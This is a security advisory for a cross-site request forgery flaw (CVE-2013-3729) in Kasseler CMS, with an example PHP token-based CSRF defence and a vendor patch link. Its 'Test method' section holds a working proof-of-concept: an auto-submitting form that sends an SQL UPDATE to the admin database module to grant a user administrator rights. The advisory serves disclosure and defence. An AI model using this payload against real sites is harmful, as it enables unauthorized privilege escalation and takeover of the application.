Released on: 2013-07-03
Updated on:
Affected Systems:
Kasseler CMS <= 2 r1223
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60929
CVE (CAN) ID: CVE-2013-3729
Kasseler CMS is a content management system.
Kasseler CMS is vulnerable to cross-site request forgery (CSRF) because the application lacks any CSRF protection mechanism. A remote attacker can trick a logged-in administrator into visiting a specially crafted web page containing CSRF exploit code. The vulnerability can be exploited to execute arbitrary SQL queries against the application database and take complete control of the application.
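The missing control is a request token tied to the administrator's session. The following is an added example, not Kasseler CMS code and not the vendor patch: a hypothetical synchronizer-token guard (function names are assumptions) that a PHP admin script would apply to every state-changing action such as the database module's SQL_query handler before running anything.

```php
<?php
// Added example: synchronizer-token CSRF guard for a PHP admin script.
// Not Kasseler CMS code; function names csrf_token()/require_csrf_token() are hypothetical.
session_start();

// Issue one unguessable token per session; embed it in every admin form as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any request that would change state unless it is a POST carrying the session token.
function require_csrf_token(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('State-changing actions must be sent via POST');
    }
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; an empty session token never matches.
    if ($expected === '' || !hash_equals($expected, (string) $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Defence in depth: a form auto-submitted from another site arrives with a foreign Origin/Referer.
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    $host   = $origin === '' ? null : parse_url($origin, PHP_URL_HOST);
    if ($host === false || ($host !== null && $host !== strtok($_SERVER['HTTP_HOST'], ':'))) {
        http_response_code(403);
        exit('Cross-origin request rejected');
    }
}

// Hypothetical dispatch for the database module: verify the token before touching the query.
if (($_GET['module'] ?? '') === 'database' && ($_GET['do'] ?? '') === 'SQL_query') {
    require_csrf_token();
    // ... only now hand $_POST['query'] to the administrator's SQL console ...
}

// When rendering the admin form, include the token so legitimate submissions pass the check:
echo '<input type="hidden" name="csrf_token" value="'
   . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
```

A forged page cannot read the victim's session token, so its auto-submitted POST fails the hash_equals() check and the query is never executed.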
<* Source: High-Tech Bridge Security Research Lab
Link: https://www.htbridge.com/advisory/HTB23158
http://seclists.org/bugtraq/2013/Jul/26
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
<form action="http://[host]/admin.php?module=database&do=SQL_query" method="post" name="main">
<input type="hidden" name="query" value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = '2', `user_group` = '1' WHERE `kasseler_users`.`uid` = 2 LIMIT 1;">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Kasseler CMS
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://diff.kasseler-cms.net/svn/patches/1232.html